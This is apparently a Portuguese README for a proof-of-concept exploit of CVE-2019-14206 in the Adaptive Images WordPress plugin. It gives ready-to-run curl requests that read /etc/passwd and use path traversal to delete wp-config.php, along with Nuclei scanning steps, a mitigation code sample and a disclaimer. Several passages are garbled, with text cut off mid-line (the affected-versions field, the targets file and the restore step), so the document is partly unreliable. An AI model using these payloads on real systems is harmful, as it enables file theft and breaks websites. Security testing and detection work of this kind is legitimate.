Share
## https://sploitus.com/exploit?id=7E3172AF-37CF-558F-9BCC-8AC3B5BC2103
# CVE-2019-14206 - Adaptive Images for WordPress Arbitrary File Deletion

## 📋 **Índice**

1. [Sobre a Vulnerabilidade](#sobre-a-vulnerabilidade)
2. [Pré-requisitos](#pré-requisitos)
3. [Instalação](#instalação)
4. [Métodos de Teste](#métodos-de-teste)
   - [Teste Rápido](#1-teste-rápido)
   - [Teste Completo com Docker](#2-teste-completo-com-docker)
   - [Teste com Nuclei](#3-teste-com-nuclei)
   - [Teste Manual](#4-teste-manual)
5. [Interpretando Resultados](#interpretando-resultados)
6. [Limpeza](#limpeza)
7. [Solução de Problemas](#solução-de-problemas)
8. [Mitigação](#mitigação)
9. [Aviso Legal](#aviso-legal)

---

## 🎯 **Sobre a Vulnerabilidade**

**CVE-ID:** CVE-2019-14206  
**Severity:** High (CVSS 6.5)  
**Plugin Afetado:** Adaptive Images for WordPress  
**Versões Afetadas:** /dev/null || echo "PHP não disponível (opcional)"
```

---

## 🚀 **Instalação**

### **Passo 1: Clonar ou Baixar os Arquivos**

```bash
# Se estiver no diretório nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# Ou baixe os arquivos necessários
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates
```

### **Passo 2: Verificar Estrutura de Arquivos**

```bash
# Verificar se os arquivos existem
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/
```

### **Passo 3: Tornar Scripts Executáveis**

```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh
```

---

## 🧪 **Métodos de Teste**

### **1. Teste Rápido** ⏱️ *2 minutos*

Execute a demonstração completa que simula toda a exploração:

```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh
```

**O que acontece:**
- Cria ambiente de teste completo
- Simula a vulnerabilidade
- Demonstra deleção de arquivo
- Valida template Nuclei

**Saída esperada:**
```
[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready
```

---

### **2. Teste Completo com Docker** 🐳 *10 minutos*

#### **Passo 1: Iniciar Ambiente Docker**

```bash
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# Se Docker estiver rodando
docker-compose up -d

# Se Docker NÃO estiver rodando, use o simulador
./docker-test-full.sh
```

#### **Passo 2: Acessar WordPress**

```bash
# O ambiente estará disponível em
# http://localhost:8888
```

#### **Passo 3: Verificar Plugin Vulnerável**

```bash
# Verificar se o script vulnerable existe
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php
```

#### **Passo 4: Executar Testes**

```bash
# Teste LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Teste File Deletion
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php
```

---

### **3. Teste com Nuclei** 🎯 *5 minutos*

#### **Passo 1: Preparar Lista de Alvos**

```bash
# Criar arquivo de alvos
cat > targets.txt = 0.6.67)
- ✅ WAF bloqueando requisições
- ✅ Servidor não responde nos caminhos esperados

---

## 🧹 **Limpeza**

### **Limpar Ambiente de Teste:**

```bash
# Remover ambiente Docker
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null

# Remover arquivos de teste
rm -rf docker-test/
rm -f targets.txt results.txt

# Restaurar wp-config.php se foi deletado
cat > wp-config.php  Plugins > Atualizar Adaptive Images
   ```

2. **Versão Segura:** >= 0.6.67

3. **Remover Plugin Vulnerável:**
   ```
   rm -rf wp-content/plugins/adaptive-images/
   ```

### **Proteção no Código (Para Desenvolvedores):**

```php
// ✅ CÓDIGO SEGURO (Exemplo de correção)
function adaptive_images_script_get_settings() {
    // Sanitizar input
    $allowed_keys = ['cache_dir', 'resolution', 'request_uri'];
    $settings = [];
    
    foreach ($allowed_keys as $key) {
        if (isset($_REQUEST['adaptive-images-settings'][$key])) {
            $settings[$key] = sanitize_text_field($_REQUEST['adaptive-images-settings'][$key]);
        }
    }
    
    return $settings;
}

function adaptive_images_delete_stale_cache_image($source_file, $cache_file, $resolution) {
    // Validar caminhos
    $allowed_cache_dirs = ['ai-cache', 'adaptive-cache'];
    $cache_dir = basename(dirname($cache_file));
    
    if (!in_array($cache_dir, $allowed_cache_dirs)) {
        return false; // Recusar caminhos inválidos
    }
    
    // Usar caminhos absolutos validados
    $cache_file = WP_CONTENT_DIR . '/ai-cache/' . basename($cache_file);
    
    if (file_exists($cache_file)) {
        unlink($cache_file);
    }
}
```

---

## ⚠️ **Aviso Legal**

### **Termos de Uso:**

Este material é fornecido **exclusivamente para fins educacionais e de teste de segurança**.

### **O que você PODE fazer:**

- ✅ Testar em sistemas que você possui
- ✅ Usar em ambientes de laboratório
- ✅ Aprendendo sobre vulnerabilidades web
- ✅ Contribuindo com segurança open source
- ✅ Testando suas próprias aplicações

### **O que você NÃO PODE fazer:**

- ❌ Testar em sistemas sem autorização
- ❌ Causar danos ou interrupções
- ❌ Utilizar para fins maliciosos
- ❌ Vender ou distribuir exploits
- ❌ Publicar informações de sistemas vulneráveis

### **Responsabilidade:**

O autor e contributors **NÃO se responsabilizam** por qualquer:
- Uso indevido deste material
- Danos causados a sistemas
- Perdas de dados
- Interrupções de serviço
- Problemas legais

### **Divulgação Responsável:**

Se você encontrar esta vulnerabilidade em sistemas reais:

1. **NÃO** exploite ou cause danos
2. **DOCUMENTE** a vulnerabilidade
3. **NOTIFIQUE** o responsável pelo sistema
4. **SIGA** as diretrizes de responsible disclosure

---

## 📚 **Recursos Adicionais**

### **Referências:**

- [NVD - CVE-2019-14206](https://nvd.nist.gov/vuln/detail/CVE-2019-14206)
- [Research Original](https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown)
- [Plugin Oficial](https://wordpress.org/plugins/adaptive-images/)
- [WPScan Entry](https://wpscan.com/vulnerability/9463)

### **Ferramentas Relacionadas:**

- [Nuclei](https://github.com/projectdiscovery/nuclei)
- [ nuclei-templates](https://github.com/projectdiscovery/nuclei-templates)
- [WPScan](https://wpscan.com/)
- [Wordfence](https://www.wordfence.com/)

---

## 🎓 **Aprendizados**

Este projeto demonstra:

1. **Input Validation:** A importância de sanitizar toda entrada do usuário
2. **Path Traversal:** Como caminhos de arquivo podem ser manipulados
3. **File Operations:** Os riscos de funções como unlink() com input do usuário
4. **Plugin Security:** Vulnerabilidades comuns em plugins WordPress
5. **CVE Analysis:** Como analisar e reproduzir vulnerabilidades
6. **Detection Development:** Como criar templates de detecção eficazes

---

## 📝 **Changelog**

### **Versão 1.0.0** (2026-01-04)
- ✅ Template Nuclei criado
- ✅ Ambiente PoC completo
- ✅ Documentação completa
- ✅ Scripts de teste validados
- ✅ Demonstração funcional

---

## 🤝 **Contribuição**

Contribuições são bem-vindas! Para contribuir:

1. Fork o repositório
2. Crie uma branch (`git checkout -b feature/improvement`)
3. Commit suas mudanças (`git commit -am 'Add improvement'`)
4. Push para a branch (`git push origin feature/improvement`)
5. Crie um Pull Request

---

## 📧 **Suporte**

Para dúvidas ou problemas:

1. Verifique a seção [Solução de Problemas](#solução-de-problemas)
2. Verifique os [issues do repositório](https://github.com/projectdiscovery/nuclei-templates/issues)
3. Documentar o problema com:
   - Sistema operacional
   - Versão do Nuclei
   - Versão do PHP (se aplicável)
   - Mensagem de erro completa
   - Passos para reproduzir

---

**🎉 Obrigado por usar este material de teste!**

Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use este conhecimento para tornar a internet mais segura, não mais vulnerável.

---

**Criado:** 4 de Janeiro de 2026  
**Versão:** 1.0.0  
**Status:** ✅ Pronto para uso em produção